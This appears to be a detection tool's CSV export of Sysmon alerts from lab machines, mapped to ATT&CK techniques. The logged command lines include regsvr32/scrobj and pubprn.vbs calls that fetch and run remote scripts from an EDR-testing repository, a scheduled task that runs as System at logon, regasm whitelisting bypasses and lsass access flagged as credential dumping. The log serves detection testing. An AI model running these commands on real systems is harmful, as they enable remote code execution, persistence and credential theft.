SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02 DFAE8213-91CC-5CE1-0000-0010BEF40600 3408 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1564436029.340889,2019-07-30T01:33:49.340889+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," 3 5 4 3 0 0x8000000000000000 4934 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Suspicious NetCon 2019-07-29 21:33:44.949 747F3D96-6638-5D3F-0000-001067BA8900 4288 C:\Windows\System32\regsvr32.exe MSEDGEWIN10\IEUser tcp true false 10.0.2.15 MSEDGEWIN10.home 49829 false 151.101.0.133 443 https ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Regsvr32,1564436026.095763,2019-07-30T01:33:46.095763+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1," 1 5 4 1 0 0x8000000000000000 4933 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:45.332 747F3D96-6639-5D3F-0000-001074F48900 208 C:\Windows\System32\calc.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Calculator Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\calc.exe" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 747F3D96-6638-5D3F-0000-001067BA8900 4288 C:\Windows\System32\regsvr32.exe regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll)",1," 1 5 4 1 0 0x8000000000000000 4931 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:44.622 747F3D96-6638-5D3F-0000-001067BA8900 4288 C:\Windows\System32\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F 747F3D96-6638-5D3F-0000-00103DA88900 1652 C:\Windows\System32\cmd.exe cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Regsvr32,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," 1 5 4 1 0 0x8000000000000000 4931 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:44.622 747F3D96-6638-5D3F-0000-001067BA8900 4288 C:\Windows\System32\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F 747F3D96-6638-5D3F-0000-00103DA88900 1652 C:\Windows\System32\cmd.exe cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," 1 5 4 1 0 0x8000000000000000 4931 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:44.622 747F3D96-6638-5D3F-0000-001067BA8900 4288 C:\Windows\System32\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F 747F3D96-6638-5D3F-0000-00103DA88900 1652 C:\Windows\System32\cmd.exe cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1557854258.250959,2019-05-14T21:17:38.250959+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3," 3 5 4 3 0 0x8000000000000000 32009 Microsoft-Windows-Sysmon/Operational alice.insecurebank.local 2019-05-14 17:17:24.660 ECAD0485-F2EC-5CDA-0000-0010F1631500 4092 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe insecurebank\Administrator tcp true false 10.59.4.20 alice.insecurebank.local 49584 false 10.59.4.11 DC1 389 ldap ",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1557854246.738627,2019-05-14T21:17:26.738627+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3," 3 5 4 3 0 0x8000000000000000 32008 Microsoft-Windows-Sysmon/Operational alice.insecurebank.local 2019-05-14 17:17:24.597 ECAD0485-F2EC-5CDA-0000-0010F1631500 4092 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe insecurebank\Administrator tcp true false 10.59.4.20 alice.insecurebank.local 49583 false 10.59.4.11 DC1 389 ldap ",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," 1 5 4 1 0 0x8000000000000000 4929 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:44.204 747F3D96-6638-5D3F-0000-00103DA88900 1652 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," 1 5 4 1 0 0x8000000000000000 4929 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:44.204 747F3D96-6638-5D3F-0000-00103DA88900 1652 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1587853142.072006,2020-04-26T02:19:02.072006+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1," 1 5 4 1 0 0x8000000000000000 27334 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-04-25 22:19:01.724 747F3D96-B755-5EA4-0000-0010D06E2500 4484 C:\Windows\System32\svchost.exe 10.0.17763.1 (WinBuild.160101.0800) Host Process for Windows Services Microsoft® Windows® Operating System Microsoft Corporation svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-3384-5EA5-0000-0020E7030000 0x3e7 0 System SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 00000000-0000-0000-0000-000000000000 596 ? ? ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1138] Application Shimming - process,1553028513.459611,2019-03-20T00:48:33.459611+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," 1 5 4 1 0 0x8000000000000000 1966368 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 20:48:33.279 365ABB72-55A1-5C91-0000-0010AB8C0700 2112 C:\Windows\System32\sdbinst.exe 6.0.7600.16385 (win7_rtm.090713-1255) Application Compatibility Database Installer Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " C:\Windows\System32\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F 365ABB72-551C-5C91-0000-001030590500 2704 C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436019.372599,2019-07-30T01:33:39.372599+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll ),1," 1 5 4 1 0 0x8000000000000000 4926 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:39.223 747F3D96-6633-5D3F-0000-001092628900 5056 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436019.358048,2019-07-30T01:33:39.358048+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll ),1," 1 5 4 1 0 0x8000000000000000 4925 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:39.152 747F3D96-6633-5D3F-0000-001051608900 4092 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436085.311645,2019-07-30T01:34:45.311645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct ),1," 1 5 4 1 0 0x8000000000000000 5004 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:45.198 747F3D96-6675-5D3F-0000-0010AA498F00 4184 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1564436081.793311,2019-07-30T01:34:41.793311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f ),1," 1 5 4 1 0 0x8000000000000000 5002 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Persistence - Scheduled Task Management 2019-07-29 21:34:40.755 747F3D96-6670-5D3F-0000-0010F9148F00 7076 C:\Windows\System32\schtasks.exe 10.0.17763.1 (WinBuild.160101.0800) Task Scheduler Configuration Tool Microsoft® Windows® Operating System Microsoft Corporation schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 747F3D96-6670-5D3F-0000-001099048F00 2916 C:\Windows\System32\cmd.exe cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1553028158.70443,2019-03-20T00:42:38.704430+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" ),1," 1 5 4 1 0 0x8000000000000000 1966330 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 20:42:38.043 365ABB72-543E-5C91-0000-001009C90300 3068 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" C:\Windows\system32\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-543D-5C91-0000-001099A60300 2984 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1003] Credential Dumping - Process Access,1556608980.899263,2019-04-30T11:23:00.899263+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10," 10 3 4 10 0 0x8000000000000000 8341 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 07:23:00.883 365ABB72-F7C9-5CC7-0000-0010BF010E00 3772 1088 D:\m.exe 365ABB72-F6A1-5CC7-0000-001072590000 492 C:\Windows\system32\lsass.exe 0x1410 C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\system32\KERNELBASE.dll+8185|UNKNOWN(01770343)|UNKNOWN(0176FF9D)|UNKNOWN(0176F8EC)|UNKNOWN(00397486)|UNKNOWN(003973A0)|UNKNOWN(003978A3)|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436080.38552,2019-07-30T01:34:40.385520+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f ),1," 1 5 4 1 0 0x8000000000000000 5000 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:40.243 747F3D96-6670-5D3F-0000-001099048F00 2916 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1," 1 5 4 1 0 0x8000000000000000 4998 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:36.528 747F3D96-666C-5D3F-0000-00104BB78E00 3872 C:\Windows\System32\calc.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Calculator Microsoft® Windows® Operating System Microsoft Corporation calc C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 747F3D96-6642-5D3F-0000-001044A68A00 2996 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh)",1," 1 5 4 1 0 0x8000000000000000 27803 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-04-25 22:19:27.149 747F3D96-B76F-5EA4-0000-0010624D0600 5840 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-B767-5EA4-0000-00209BD30100 0x1d39b 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-B769-5EA4-0000-001000800300 4472 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1," 1 5 4 1 0 0x8000000000000000 4998 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:36.528 747F3D96-666C-5D3F-0000-00104BB78E00 3872 C:\Windows\System32\calc.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Calculator Microsoft® Windows® Operating System Microsoft Corporation calc C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 747F3D96-6642-5D3F-0000-001044A68A00 2996 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1," 1 5 4 1 0 0x8000000000000000 27803 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-04-25 22:19:27.149 747F3D96-B76F-5EA4-0000-0010624D0600 5840 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-B767-5EA4-0000-00209BD30100 0x1d39b 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-B769-5EA4-0000-001000800300 4472 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1," 1 5 4 1 0 0x8000000000000000 27803 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-04-25 22:19:27.149 747F3D96-B76F-5EA4-0000-0010624D0600 5840 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-B767-5EA4-0000-00209BD30100 0x1d39b 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-B769-5EA4-0000-001000800300 4472 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1059 ] wscript or cscript runing script,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}) in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 4994 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:35.763 